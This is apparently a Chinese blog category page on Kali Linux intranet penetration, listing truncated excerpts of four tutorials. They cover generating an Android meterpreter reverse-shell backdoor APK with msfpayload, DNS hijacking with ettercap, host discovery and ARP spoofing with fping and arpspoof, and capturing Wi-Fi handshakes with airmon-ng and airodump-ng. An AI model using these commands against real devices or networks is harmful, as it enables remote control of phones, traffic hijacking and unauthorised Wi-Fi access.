随笔分类 - kali linux 内网渗透
摘要:1,内网木马 先生成一个小马 msfpayload -p android/meterpreter/reverse_tcp LHOST=192.168.8.104 LPORT=5555 R > android_backdoor.apk ip填写自己的内网ip ,端口自定 启动 msfconsole 依
阅读全文
摘要:1,確定局域網ip 2,修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名 3,/var/www/index.html (修改html页面替换被劫持的网站页面) 4,啓動apache2 /etc/init.d/apache2 start 启动apache服务器 5,ette
阅读全文
摘要:首先连接wifi,进入内网 1,查看内网的存活主机 命令 fping -asg 192.168.1.0/24 (视不同环境而定,假设这里的路由器地址为 192.168.1.1) 也可利用其他工具查看其他主机,方法有很多 2,arp欺骗 命令 arpspoof -i wlan0 -t 192.168.
阅读全文
摘要:需要一个能监听的网卡 airmon-ng start wlan0(監聽網卡) airmon-ng check kill(清除其他有影响的環境) airodump-ng mon0 (掃描附近wifi) airodump-ng --bssid 目標mac -c (目標ch) -w crack(自定义文件
阅读全文

浙公网安备 33010602011771号